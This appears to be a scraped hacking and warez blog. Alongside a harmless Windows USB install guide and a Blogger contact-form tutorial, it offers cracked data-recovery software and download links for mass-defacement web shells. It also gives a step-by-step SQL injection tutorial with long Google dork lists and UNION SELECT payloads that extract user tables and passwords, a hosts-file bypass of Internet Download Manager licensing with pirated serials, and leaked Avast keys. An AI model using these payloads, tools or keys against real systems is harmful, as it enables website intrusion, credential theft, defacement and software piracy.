468x60 ads

.



Download free full version Of data recovery tool Easeus Data Recovery Wizard Professional

0 comments


Easeus Data Recovery Wizard Professional is a tool used to recover data which is lost due to deletion, 

virus attacks, format, partition loss, operating system crash etc. This tool is very easy to use and helps us to recover all type or format of data whether it is a video or a text document. Sometimes we delete the data by a mistake or we lost the data due to VIRUS attacks.  So we can recover that data using this tool. It is the best tool used for recovering the data

 Free version is also available but it only provides 1 GB of data to recover but i am making you available premium version free of cost.  To download this tool click download button below.

 
Mirror


Easy way of installing Window 7 using USB drive

0 comments

Today i am going to share a very easy way of installing Window 7 using USB drive.It is very easy and secured method so you should not suffer any kinds of pain.lets start :D

"It's time to be smart with smart windows"


Installing windows 7 using USB drive


What are basic requirements ?
-----Windows 7 DVD
-----And a USB drive having minimum capacity of 4GB.


 What  are advantages if we install window 7 using flash drive ?

----First overall speed of the installation willl increase significantly.
----Carrying USB is more easy and convienient than DVD.
----It also become possible to install windows 7 on  that systems which are not having  DVD drives    such as Net book..


Steps of installing windows 7 using USB drive.
---- Insert USB
---- Run the command prompt as administrator. (Type cmd in start and right click on cmd and click on "run as administrator".)
----In the command prompt type the following command

     -DISKPART

 A new window will appear and execute the following commands in that new window.
 -LIST DISK
-SELECT DISK 1
-CLEAN
-CREATE PARTITION PRIMARY
-SELECT PARTITION 1
-ACTIVE
-FORMAT FS=NTFS
  (This process may take few seconds)
-ASSIGN
-EXIT
Do not  close the command prompt. Minimize it.
----Insert window 7 DVD .
----Maximize cmd and execute the following commands
-   N: CD BOOT   (hit enter Here "N" is my DVD drive letter write your one's here)
-   CD BOOT
-   BOOTSECT.EXE/NT60 O:  (Here "O" is my USB drive letter)
After entering the command this messages appear
                          Your USB device is ready for the boot. Now copy the content of DVD to the USB.
The thing you left to do is to enabling the USB boot options in the BIOS from CD-ROM or HDD.
Enjoy installing windows from USB . If any problem leave it in the comment section.

iCare Data Recovery Professional 4.5.3 Full Version Download

1 comments


What's Special - Free lifetime upgrade, dynamic disk recovery

Besides all the basic functions, the professional edition adds on new features like free upgrading supported if new version released. It is especially useful when your computer encounters system/disk crashes and you need to reinstall iCare Data Recovery. And it could efficiently retrieve lost files from dynamic disk.

What's more? It could recover files from formatted drive, RAW file system, drive has not formatted error, RAW drive, undelete files emptied recycle bin, recover files due to partition lost, system crash, software crash, bad boot sector, missing boot sector, bad MBR, $MFT damaged, lost partition table, lost or damaged FAT, virus infections, power failure, and other unknown data loss...

iCare Data Recovery Professional works perfectly with hardware RAID and hard drive, USB drive, SD card, memory card, etc. It provides the comprehensive data recovery solution for computer users.

Screenshot
Key Features of iCare Data Recovery Professional
  • Recover files from formatted partition, memory card, external drive, USB drive, sd card...
  • Recover 2TB disk
  • drive not formatted error and report RAW file system
  • Recover MAC files on Windows
  • Free lifetime upgrade once new edition released
  • Recover data when lost due to resize partition, merge partition, copy partition failure by PartitionMagic, Partition Manager...
  • It could restore photos, office files, zip files, rar files, emails, pdf files, etc.
  • Reformatted sd card, xd card, cf card, pen stick, memory card...
  • System cannot boot, cannot locate the boot partition, I/O error
  • external drive, memory card, cf card cannot be detected or recognized...
  • Virus attack and lost files
  • Bad boot sector, bad partition table, damaged FAT, lost File Allocation Table...
  • Recover files from FAT, NTFS partitions
  • Recover files from devices with unknown file systems including Hard Disk, external ZIP/USB drive, removable SmartMedia, MemoryStick, SD cards, etc.
  • Partition structures are damaged or deleted...

Bca Private Script -Best Mass Defacer gun For Linux Server

0 comments

It is one of the best mass defacer for linux server. You can Symlink and Deface a server Using this shell :) This is unique shell which is developed by Bangladesh Cyber Army.And this shell was leaked by 3xp1r3 Cyber Army..Here is the shell

Download

Shell Scanner - Scan Your server for finding Backdoor

0 comments

You can find all backdoor scripts using this little scanner. Just upload this script and open it..After hacking your site a hacker must leave any backdoor script on your server for getting future access so must find and remove that script.

A backdoor in an Operating System or a complex application is a method of bypassing normal authentication and gain access. During the development of an Operating System or application, programmers add back doors for different purposes. The backdoors are removed when the product is ready for shipping or production. When a backdoor is detected, which is not removed, the vendor releases a maintenance upgrade or patch to close the back door.
Another type of back door can be an installed program or could be a modification to an existing program. The installed program may allow a user log on to the computer without a password with administrative privileges. Many programs ara available on internet to create back door attacks on systems. One of the more popular tools is Back Orifice which is also available for free download on internet. 

Download

Asp Mass Defacer By Mental Way-Daface WIndows server easily

1 comments

using this script you can deface windows server easily.This asp script has a uniqe feature.You can give mass deface on Windows server using this script.Its created by Mental way-- Here is the script

Download

SQL Injection Tutorial : A Step-by-Step Tutorial ( noob friendly )

15 comments

Sql Injection is a common way for hacking.But its a master way because you can find many sites are sql vulnerable.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

Step-by-Step tutorial for SQL Injection
Step 1: Find a website that is vulnerable to the attack. This is the first step in SQLi and like every other hack attack is the most time consuming, and is the only time consuming step. Once you get through this, rest is a cake-walk. Now, let us all know what kind of pages are vulnerable to this attack. We are providing you with a few dorks(google strings to find vulnerable sites). Though at the end of this post, we'll provide a list of vulnerable sites.



Dorks:
"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id= 
and you can also write your own.

How to check if a webpage is vulnerable to this attack???
Once you execute the dorks and get the preferred search results. Say for example
hxxp://www.abcd.com/index.php?catid=1

Add a ' (apos) at the end of the URL. Such that the URL looks like
hxxp://www.abcd.com/index.php?catid=1'

If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.

Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():

Step 2:Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.

Append an 'order by' statement to the URL.
eg. hxxp://www.abcd.com/index.php?catid=1 order by 1

Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. Now to know the column numbers which are accepting the queries.

Append an 'Union Select' statement to the URL. Also precede the number after "id=" with a hyphen or minus.
Say from the above step, you got that the table has 6 columns.
eg. hxxp://www.abcd.com/index.php?catid=-1 union select 1,2,3,4,5,6

Result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns.

Step 3: Enumerating the SQL version
We'll use the mysql command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2.

eg. hxxp://www.abcd.com/index.php?catid=-1 union select 1,@@version,3,4,5,6

You'll get the version of the database in the place  where you had got the number 2. If the starting of the version number is 5 or more, then you are good to go. If less move on to another site.

Step 4:  Expolit
To get list of databases:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--

Result will display a list of databases on the site. Here on, we'll write the results we have got from our test.
Result: information_schema,vrk_mlm

To know the current database in use:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6--
Result: vrk_mlm

To get the current user:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost

To get the tables:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users

We'll concentrate our attack on the users table.

To get the columns:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
Result:  admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,
prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,
refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,
email_id,password,edited_on,last_login,created_on,chain_number,phone,address

By lookin at the columns closely, and the order of the tables, we can conclude that starting from id,incredible_id are the columns belonging to the users table and we are interested in that.

Extract information:
union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0
x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--

Now you will may find username and password of admin panel :D
Happy Hacking!!!

How to Solve IDM ( Internet Download Manager ) fake key serial number problem

70 comments

Internet Download Manager is a one of the best download manager in the world. But Sometime we see an error box with this massage

"Internet Download Manager has been registered with a fake serial number or serial number has been blocked. IDM is now exiting.......".
Its mean we can not use this software again ! lolz its not true that we can not use it :P we will use it again and again..ok lets start the hacking....

1st Method of Solving this problem:

Step 1. First all you need to delete idm from your computer which can be done by following steps.

  • Go to Start>>Run
  • Type Regedit
  • Go to HKEY_LOCAL_MACHINE\SOFTWARE
  • Delete Folder "Internet Download Manager"

Step 2. Exit IDM from the taskbar.
Step 3. Go to directory C:\Windows\system32\drivers\etc\ 
Step 4. Open the "hosts" file in the "notepad".
 Step 5. On the last line enter127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com

6.  When finished, do not forget to save (Ctrl+S). Open IDM, (go to start menu, internet download manager).
7. IDM registration tab will b open just put any below key , to better fill the serial number first.
       To be content with the serial number is (choose one):
2P4OX-613CB-RDOWV-H1BDE
3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
GZLJY-X50S3-0S20D-NFRF9.

Note: You must insured that Idm install in "C:\Program Files\Internet Download Manger" folder instead of Window Temp folder.
 
2nd Method of Solving this Problem:
 
Step 1.First of all uninstall the IDM completely from yourcomputer then clean the registry with any registry cleaner(C Cleaner).

Step 2
.Restart your computer and install  copy of cracked IDM and you will never have to worry about the Registration
 

Note: never update idm in future.


If you have any problem then write in comments...

easy way of adding contact page in blogger/blogspot site

1 comments

Do you want to add a contact me page on your blogs? Contact page is good for visitors to contact the owner of blog and ask any question.In This tutorial i will show you the step by step method to create contact  page on blogger/blogspot.To create a contact form Go to Google drive and sign in. Now Click on Create and select Form. A form creation page will open, type the title of your form.
Now Type question title. The most common questions are
  • Name,
  • Email and comment etc. 
 Select question type text for name and Email and question type paragraph for comment. Now your form will look like this.

  

Now save the form and click on More action > Embed copy the html code.

Now You have created your form and copied the html code, now its time to make contact me page in blogger. Follow the instructions. Go to your blog and create a new page and select blank page.




Give post title Contact me. Go to HTML section and paste the code.( You can change the width of the page, You can find width in HTML code and change it. The default width is (760px). However you can change it. Publish your page. Your contact page is now live in your blog. To be notified by Email whenever someone submit a form, go back to Google drive and open your created contact me form, click on Tools > Notification rules. Here you can set Email notification.If You have any question leave your comment.

Avast v4.8, Avast 5, and Avast 6.0 Genune license key (valid till 2038)

4 comments

If you are looking for a high class antivirus for your pc, you must try avast anti-virus.It is one of the best antivirus in the world and it can detect any kinds of virus.So, we strongly recommended you to use this anti-virus.Avast is a powerful antivirus software works on Windows PC or Computer. Currently you can download Avast v6.0. There are about so many users who trusted their computer security to Avast.
I’m sure after you’ve tested Avast, you’ll never regret and you’ll even more curious on how to use Avast until few weeks or even few months next. Just FYI: avast! antivirus products are available to download for a free 30-day trial period. But luckily, you can simply use this leaked serial key code to unlock and activate Avast antivirus for usage until 2038. Wow..that’s a very long time usage.
Curious? Then quickly download Avast 6.0 and use following activation key code which is valid until 2038. However if you don’t get as fast as possible, Avast may block this leaked serial number (key code). The license key is valid to activate Avast v4.8, Avast 5, and Avast 6.0.















Note: For non-commercial usage only of Avast Free Edition.
Leaked Avast Key Code:
W6754380R9978A0910-4TZ59467
W7414234R9978A0912-1CKJF7CA
W2883930R9958A0912-69B2ENTN
W7074160R9966A0910-ME228MPP
W6754380R9978A0910-4TZ59467
W5976768R9975A0912-A25DETRM
W1898490R9977A0910-V7RZECSS
W7313705R9966A0911-VMW8Y2AH
W7386915R9955A0910-FKUZHAXJ
W2050275R9942A0910-YRL5MKCS
W3089468R9947A0912-N6U6XXN5
W7600086R9964A0910-FPVUVFSR
W8353903R9975A0910-XA2SBVNH
W5476646R9963A0912-CM7R44NJ
W6832724R9941A0910-48L73FY1
W1679696R9956A0910-KK3DHPT3